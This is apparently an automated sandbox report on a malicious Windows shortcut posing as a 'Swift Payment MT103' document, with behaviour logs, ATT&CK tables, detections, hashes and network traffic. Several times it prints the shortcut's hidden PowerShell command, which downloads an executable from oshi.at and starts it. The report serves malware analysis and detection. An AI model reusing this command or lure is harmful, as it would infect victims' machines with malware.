Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4776Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5034Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2960404890.00000227FDA82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri https://oshi.at/uwmg/payloas.exe -outfile $env:userprofile\downloads\setup_x86.exe; start-process $env:userprofile\downloads\setup_x86.exe }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Swift Payment MT103.lnk32%ReversingLabsWin32.Trojan.Boxter
Swift Payment MT103.lnk38%VirustotalBrowse
Swift Payment MT103.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
oshi.at6%VirustotalBrowse
SourceDetectionScannerLabelLink
https://oshi.at0%Avira URL Cloudsafe
https://go.microsoft.co60%Avira URL Cloudsafe
https://oshi.at/uwmg/Payloas.exe100%Avira URL Cloudmalware
http://oshi.at0%Avira URL Cloudsafe
https://oshi.at/uwmg/Payloas.exe5%VirustotalBrowse
http://oshi.at6%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
oshi.at
188.241.120.6
truetrueunknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2956509561.00000227F58C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://oshi.atpowershell.exe, 00000000.00000002.2940710291.00000227E6D2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2940710291.00000227E6CFE000.00000004.00000800.00020000.00000000.sdmptrue
    • 6%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://oshi.at/uwmg/Payloas.exepowershell.exe, 00000000.00000002.2940710291.00000227E6D32000.00000004.00000800.00020000.00000000.sdmp, Swift Payment MT103.lnktrue
    • 5%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://go.micropowershell.exe, 00000000.00000002.2940710291.00000227E6342000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2956509561.00000227F58C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Iconpowershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://oshi.atpowershell.exe, 00000000.00000002.2940710291.00000227E6A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2940710291.00000227E6D0E000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.2940710291.00000227E5711000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2940710291.00000227E5711000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://oshi.at/uwmg/payloas.exepowershell.exe, 00000000.00000002.2940190766.00000227E3515000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          https://go.microsoft.co6powershell.exe, 00000000.00000002.2959798789.00000227FD796000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          188.241.120.6
                          oshi.atRomania
                          49626SEMSAT-ASCaraniNr100ROtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1559104
                          Start date and time:2024-11-20 07:52:06 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 11s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Swift Payment MT103.lnk
                          Detection:MAL
                          Classification:mal92.winLNK@2/6@1/1
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 4
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .lnk
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 2316 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          TimeTypeDescription
                          01:53:01API Interceptor1666x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.241.120.6Facturation.exeGet hashmaliciousDoeneriumBrowse
                          • oshi.at/
                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                          • oshi.at/
                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                          • oshi.at/
                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                          • oshi.at/
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          oshi.atFacturation.exeGet hashmaliciousDoeneriumBrowse
                          • 188.241.120.6
                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                          • 188.241.120.6
                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                          • 194.15.112.248
                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                          • 194.15.112.248
                          JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                          • 5.253.86.15
                          Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                          • 194.15.112.248
                          jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                          • 188.241.120.6
                          TamenuV11.msiGet hashmaliciousUnknownBrowse
                          • 5.253.86.15
                          Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                          • 188.241.120.6
                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                          • 188.241.120.6
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SEMSAT-ASCaraniNr100ROFacturation.exeGet hashmaliciousDoeneriumBrowse
                          • 188.241.120.6
                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                          • 188.241.120.6
                          jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                          • 188.241.120.6
                          Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                          • 188.241.120.6
                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                          • 188.241.120.6
                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                          • 188.241.120.6
                          No context
                          No context
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9434
                          Entropy (8bit):4.928515784730612
                          Encrypted:false
                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                          MD5:D3594118838EF8580975DDA877E44DEB
                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:Nlllulbnolz:NllUc
                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4512
                          Entropy (8bit):3.7665964321437984
                          Encrypted:false
                          SSDEEP:48:xr3ZGBak5B0/JlzeSogZokE5B0/JlIeSogZoQ1:xrIB5C/JVHa5C/JEHj
                          MD5:04D19B8F839F5AC504DDA93A34FDF08E
                          SHA1:19F6FF3F5C7D911B6E2F5162AF875F2D5762AFE7
                          SHA-256:CE97FAD86CC9F82619A3E987C6144C818EDA7DBCF29C08FA9D9BAD05A87BDAAC
                          SHA-512:3DBDD5E79EC2FB212CE5FC5C2C07B2C5ECFD7910BA18A26385AECF4E0E7334CCC8E94396C162D0049034CCF0081A3EB6C973245363D4FD120963760A720BD607
                          Malicious:false
                          Preview:...................................FL..................F. .. ...T5.m.....%M..;.......;..:............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........o.....%M..;....|.2.:...tY.6 .SWIFTP~1.LNK..`......DW.rtY.6..............................S.w.i.f.t. .P.a.y.m.e.n.t. .M.T.1.0.3...l.n.k.......^...............-.......]..............v.....C:\Users\user\Desktop\Swift Payment MT103.lnk..`.......X.......580913...........hT..CrF.f4... .Ky2=.b...,...W..hT..CrF.f4... .Ky2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwHtY.6....3......................4..W.i.n.d.o.w.s.....Z.1.....tY.6..System32..B......OwHtY.6..............................S.y.s.t.e.m.3.2.....t.1......O.I..W
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4512
                          Entropy (8bit):3.7665964321437984
                          Encrypted:false
                          SSDEEP:48:xr3ZGBak5B0/JlzeSogZokE5B0/JlIeSogZoQ1:xrIB5C/JVHa5C/JEHj
                          MD5:04D19B8F839F5AC504DDA93A34FDF08E
                          SHA1:19F6FF3F5C7D911B6E2F5162AF875F2D5762AFE7
                          SHA-256:CE97FAD86CC9F82619A3E987C6144C818EDA7DBCF29C08FA9D9BAD05A87BDAAC
                          SHA-512:3DBDD5E79EC2FB212CE5FC5C2C07B2C5ECFD7910BA18A26385AECF4E0E7334CCC8E94396C162D0049034CCF0081A3EB6C973245363D4FD120963760A720BD607
                          Malicious:false
                          Preview:...................................FL..................F. .. ...T5.m.....%M..;.......;..:............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........o.....%M..;....|.2.:...tY.6 .SWIFTP~1.LNK..`......DW.rtY.6..............................S.w.i.f.t. .P.a.y.m.e.n.t. .M.T.1.0.3...l.n.k.......^...............-.......]..............v.....C:\Users\user\Desktop\Swift Payment MT103.lnk..`.......X.......580913...........hT..CrF.f4... .Ky2=.b...,...W..hT..CrF.f4... .Ky2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwHtY.6....3......................4..W.i.n.d.o.w.s.....Z.1.....tY.6..System32..B......OwHtY.6..............................S.y.s.t.e.m.3.2.....t.1......O.I..W
                          File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                          Entropy (8bit):3.4555233987196985
                          TrID:
                          • Windows Shortcut (20020/1) 100.00%
                          File name:Swift Payment MT103.lnk
                          File size:1'338 bytes
                          MD5:70c92f627826616f5fa787c2f337ebe4
                          SHA1:50b64a1d02e839ac617c3c0d7709ae9fc7517684
                          SHA256:03bd489ad4cce2c7981c0fe9aae208a72f84c642116950c47af37a26480987d8
                          SHA512:5a488b9d0826dc853d436762a4b05b3be47a1a854f59102d7b10cb9080d8265b6bc70a3a77e9f18c0dcf776c0037ecf35f33f57811b4079fb698b717076717a9
                          SSDEEP:24:8A4/BHYVKVWU+/CWb5iAGfckytajC9tUMkWbjC9PHhGO:8x5a1ZrkyDtH2Z
                          TLSH:102104145EF20724E7B7DA396CBAF311C5767C82EE628F9E01401A896925220F5B4F3F
                          File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                          Icon Hash:14ec98b2bae9ed0d

                          General

                          Relative Path:..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Command Line Argument:-windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
                          Icon location:
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 20, 2024 07:53:03.494910002 CET49705443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:03.494946003 CET44349705188.241.120.6192.168.2.5
                          Nov 20, 2024 07:53:03.495016098 CET49705443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:03.511264086 CET49705443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:03.511286020 CET44349705188.241.120.6192.168.2.5
                          Nov 20, 2024 07:53:46.281867981 CET44349705188.241.120.6192.168.2.5
                          Nov 20, 2024 07:53:46.282695055 CET49705443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:46.290982008 CET49705443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:46.290999889 CET44349705188.241.120.6192.168.2.5
                          Nov 20, 2024 07:53:46.307141066 CET61723443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:46.307195902 CET44361723188.241.120.6192.168.2.5
                          Nov 20, 2024 07:53:46.307266951 CET61723443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:46.307648897 CET61723443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:53:46.307667017 CET44361723188.241.120.6192.168.2.5
                          Nov 20, 2024 07:54:29.095381021 CET44361723188.241.120.6192.168.2.5
                          Nov 20, 2024 07:54:29.095479012 CET61723443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:54:29.096487999 CET61723443192.168.2.5188.241.120.6
                          Nov 20, 2024 07:54:29.096508980 CET44361723188.241.120.6192.168.2.5
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 20, 2024 07:53:03.471528053 CET6089553192.168.2.51.1.1.1
                          Nov 20, 2024 07:53:03.480161905 CET53608951.1.1.1192.168.2.5
                          Nov 20, 2024 07:53:20.520397902 CET53648971.1.1.1192.168.2.5
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 20, 2024 07:53:03.471528053 CET192.168.2.51.1.1.10xafb5Standard query (0)oshi.atA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 20, 2024 07:53:03.480161905 CET1.1.1.1192.168.2.50xafb5No error (0)oshi.at188.241.120.6A (IP address)IN (0x0001)false
                          Nov 20, 2024 07:53:03.480161905 CET1.1.1.1192.168.2.50xafb5No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false

                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:01:52:59
                          Start date:20/11/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:1
                          Start time:01:52:59
                          Start date:20/11/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
